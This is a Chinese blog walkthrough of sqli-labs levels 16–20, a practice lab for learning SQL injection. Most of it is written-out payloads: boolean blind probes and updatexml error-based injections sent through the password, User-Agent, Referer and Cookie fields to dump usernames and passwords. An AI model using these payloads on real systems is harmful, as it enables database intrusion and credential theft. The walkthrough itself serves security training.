首页 > 数据库 >sqli-labs靶场通关攻略 16-20

sqli-labs靶场通关攻略 16-20

时间:2024-08-22 19:51:32浏览次数:13  
标签:20 name 16 步骤 labs select table concat schema

主页有sqli-labs靶场通关攻略 1-15

第十六关 less-16

步骤一:判断闭合方式为admin")  and 1=1#

步骤二:判断列数

admin") order by 2 # 数据正常

admin") order by 3 #数据报错

得出结果2列

步骤三:判断数据库长度

1") or length(database())=8 #

说明数据裤字符长度为8

步骤四:判断数据库名

1") or substr((select database()),1,1)='s' #

说明数据库的第一个字符为's'通过该语句得出数据库名为'sericuty'

步骤五:判断表名

(1)确定表数量

") or (select count(table_name) from information_schema.tables where table_schema=database())=4 #

说明有四个表

(2)表名:1") or substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e' #

找到user表

步骤六:判断表中列名

1") or substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u' #

​users表中有username

步骤七:查询数据

1") or substr((select username from users limit 0,1),1,1)='D' #

第十七关 less-17

步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater

步骤二:在passwd=admin后输入'报错

闭合方式为' --+

步骤三:查询数据库

admin'and updatexml(1,concat(1,database()),1)--+

步骤四:查表名

admin' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

步骤五:查列名

admin' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

第十八关 less-18

步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater

步骤二:在User-agent后输入'报错

闭合方式为1' and'

步骤三:查询数据库

1'and updatexml(1,concat(1,database()),1)and'

步骤四:查表名

1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'

步骤五:查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)and'

步骤六:查看users表中所有信息

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

第十九关 less-19

步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater

步骤二:在Referer后输入'报错

闭合方式为' and'

步骤三:查询数据库

'and updatexml(1,concat(1,database()),1)and'

步骤四:查表名

1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'

步骤五:查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'

步骤六:查看users表中所有信息

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

第二十关 less-20

步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater

步骤二:在Cookie后输入'报错

闭合方式为' --+

步骤三:查询数据库

'and updatexml(1,concat(1,database()),1)--+

步骤四:查表名

' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

步骤五:查列名

' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

步骤六:查看表中信息

' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)--+

标签:20,name,16,步骤,labs,select,table,concat,schema
From: https://blog.csdn.net/2301_82061181/article/details/141397343

相关文章

  • 【Windows Server2016下Oracle11g DG配置实操步骤】
    WindowsServer2016下Oracle11gDG配置实操步骤文章目录WindowsServer2016下Oracle11gDG配置实操步骤前言一、部署规划1.1、虚拟机搭建:1.2、环境规划:1.3、主库操作系统配置1.4、数据库安装和实例创建1.5、监听配置1.6、网络配置1.7、克隆虚拟机二、主库配置2.1、查看......
  • 2024杭电多校第10场
    101002scenery(hdu7542)由于\(l\)序列不增、\(r\)序列不降,每处景色的拍摄安排在可选时间的开始/结束位置显然是最优的。设\(dp[i][j]\)表示(从后往前)考虑到第\(i\)处景色、可选时间从\(j\)开始的最晚结束位置,则转移方程:\(dp[i][max(l_i,j)+t_i]=max(dp[i][max(......
  • 【专题】2023-2024中国游戏企业研发竞争力报告合集PDF分享(附原数据表)
    原文链接: https://tecdat.cn/?p=37447 在当今的数字时代,游戏产业已然成为经济与文化领域中一股不可忽视的重要力量。2023年,中国自研游戏市场更是呈现出一片繁荣且复杂的景象,实际销售收入达到了令人瞩目的2563.8亿元,同比增长15.3%,不仅刷新历史纪录,还彰显出其强大的市场活力......
  • FPGA开发——DS18B20读取温度并且在数码管上显示
    一、简介        在上一篇文章中我们对于DS18B20的相关理论进行了详细的解释,同时也对怎样使用DS18B20进行了一个简单的叙述。在这篇文章我们通过工程来实现DS18B20的温度读取并且实现在数码管伤显示。1、基本实现思路根据不同时刻的操作,我们可以使用一个状态机来实......
  • 2024年8月【最新】《黑神话:悟空》【电脑配置要求】黑神话 悟空 电脑配置【推荐】
    (本人经核验测评后推荐二、三、四配置)目录:一、最低配置:(官方发布)二、普通配置:三、高端配置:四、豪华配置: 正文:一、最低配置:(官方发布)1、CPU:因特尔i58400或AMDRyzen516002、内存:16G3、显卡:GTX1060缓存6G或AMDRX5808G4、硬盘:130G(固态)(安装后大小128G)(忽略)......
  • 信息学奥赛初赛天天练-72-NOIP2016普及组-基础题3-无向图、简单无向图、自环、平行边
    NOIP2016普及组基础题35以下不是存储设备的是()A光盘B磁盘C固态硬盘D鼠标6如果开始时计算机处于小写输入状态,现在有一只小老鼠反复按照CapsLock、字母键A、字母键S、字母键D、字母键F的顺序循环按键,即CapsLock、A、S、D、F、CapsLock、A、S、D、F......
  • RK3588开发笔记-pdm接口ES7201音频采集调试记录
    目录​​​​​​​前言一、ES7201技术规格二、PDM接口说明RK3588的PDM接口特性三、原理图连接四、内核配置五、音频调试总结前言        在RK3588开发过程中,音频采集是一个常见的需求,而PDM(PulseDensityModulation)接口因其简单性和低成本广泛应用......
  • 中国电信公布2024年中期业绩!
    8月20日中国电信公布2024年中期业绩亮点满满今天,和小翼一起来了解下吧 经营业绩稳健增长,高质量发展持续向好,持续强化科技创新,加快发展新质生产力2024年上半年,中国电信紧抓发展机遇,完整准确全面贯彻新发展理念,坚定履行建设网络强国和数字中国、维护网信安全责任,持续深入实施......
  • 164. 可达性统计 topsort
    //164.可达性统计.cpp:此文件包含"main"函数。程序执行将在此处开始并结束。///*https://www.acwing.com/problem/content/166/给定一张N个点M条边的有向无环图,分别统计从每个点出发能够到达的点的数量。输入格式第一行两个整数N,M,接下来M行每行两个整数x,......
  • JESD79-5C_v1.30-2024 JEDEC DDR5 SOLID STATE TECHNOLOGY ASSOCIATION 最新内存技术
    JESD79-5C_v1.30-2024JEDECDDR5SOLIDSTATETECHNOLOGYASSOCIATION最新DDR5内存技术规范​JEDEC技术协会公布新DDR5内存规范、更稳定、安全,支持PRAC新技术下载: https://download.csdn.net/download/tgs2033/89661013样本下载:链接:https://pan.baidu.com/s/13-Ioep......